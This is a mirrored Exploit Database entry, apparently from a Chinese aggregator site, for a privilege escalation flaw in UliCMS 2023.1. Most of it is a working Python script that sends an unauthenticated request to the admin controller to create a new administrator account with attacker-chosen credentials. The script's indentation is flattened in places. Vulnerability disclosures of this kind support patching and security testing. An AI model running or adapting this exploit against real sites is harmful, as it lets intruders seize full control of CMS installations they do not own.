Ulicms-2023.1-sniffing-vicuna – Privilege escalation

• Exploit Database
• 15 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-05-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51433/

• #Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation
  #Application: Ulicms
  #Version: 2023.1-sniffing-vicuna
  #Bugs:Privilege escalation
  #Technology: PHP
  #Vendor URL: https://en.ulicms.de/
  #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
  #Date of found: 04-05-2023
  #Author: Mirabbas Ağalarov
  #Tested on: Linux 
  
  ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna
  
  import requests
  
  new_name=input("name: ")
  new_email=input("email: ")
  new_pass=input("password: ")
  
  url = "http://localhost/dist/admin/index.php"
  
  headers = {"Content-Type": "application/x-www-form-urlencoded"}
  
  data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="
  
  response = requests.post(url, headers=headers, data=data)
  
  if response.status_code == 200:
  print("Request is success and created new admin account")
  
  else:
  print("Request is failure.!!")